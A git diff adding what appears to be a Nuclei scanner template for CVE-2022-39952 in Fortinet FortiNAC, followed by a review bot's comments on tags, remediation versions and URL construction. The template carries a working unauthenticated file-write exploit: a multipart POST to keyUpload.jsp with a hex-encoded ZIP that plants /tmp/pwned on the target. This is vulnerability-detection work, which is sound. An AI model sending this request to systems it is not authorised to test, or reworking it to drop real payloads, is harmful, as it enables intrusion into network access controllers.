diff --git a/cves/2022/CVE-2022-39952.yaml b/cves/2022/CVE-2022-39952.yaml
new file mode 100644
index 0000000000..a59029d464
--- /dev/null
+++ b/cves/2022/CVE-2022-39952.yaml
@@ -0,0 +1,45 @@
+id: CVE-2022-39952
+
+info:
+ name: FortiNAC Unauthenticated Arbitrary File Write
+ author: dwisiswant0
+ severity: critical
+ description: |
+ A external control of file name or path in Fortinet FortiNAC versions
+ 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11,
+ 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7
+ may allow an unauthenticated attacker to execute unauthorized code or
+ commands via specifically crafted HTTP request.
+ reference:
+ - https://www.fortiguard.com/psirt/FG-IR-22-300
+ - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
+ remediation: Upgrade to FortiNAC version 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above
+ tags: fortinet,fortinac,cve,cve2022,fileupload,rce
+
+variables:
+ boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}"
+ payloadHex: "504b030414000000000031b155567e5304d9050000000500000009000000746d702f70776e656470776e6564504b0102140314000000000031b155567e5304d90500000005000000090000000000000000000000b48100000000746d702f70776e6564504b05060000000001000100370000002c0000000000"
+ # payloadHex = /tmp/pwned, content "pwned"
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/configWizard/keyUpload.jsp"
+ - "{{BaseURL}}:8443/configWizard/keyUpload.jsp"
+ headers:
+ Content-Type: "multipart/form-data; boundary={{boundaryId}}"
+ body: |
+ --{{boundaryId}}
+ Content-Disposition: form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip"
+
+ {{hex_decode(payloadHex)}}
+ --{{boundaryId}}--
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "zipUploadSuccess"
+ - "SuccessfulUpload"
+ condition: and
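Review bot: The upload leaves a persistent artifact on the scanned host (`/tmp/pwned`, per the `# payloadHex` comment) yet the `tags` line does not mark the template as state-changing, so operators who exclude intrusive templates from routine scans will still run it; change it to `tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive` and consider saying in `description` that a file is written to the target. The `remediation` string lists `9.2.6` twice, which looks like a typo for one of the other fixed branches named in the description; check it against the FG-IR-22-300 reference rather than guessing. The second `path` entry appends `:8443` to `{{BaseURL}}`, which presumably yields a malformed URL whenever the configured base already carries an explicit port; building that entry from the scheme and host variables would avoid the double port. Since `description` is a literal block, "A external control of file name or path" would also read better as "An external control of file name or path".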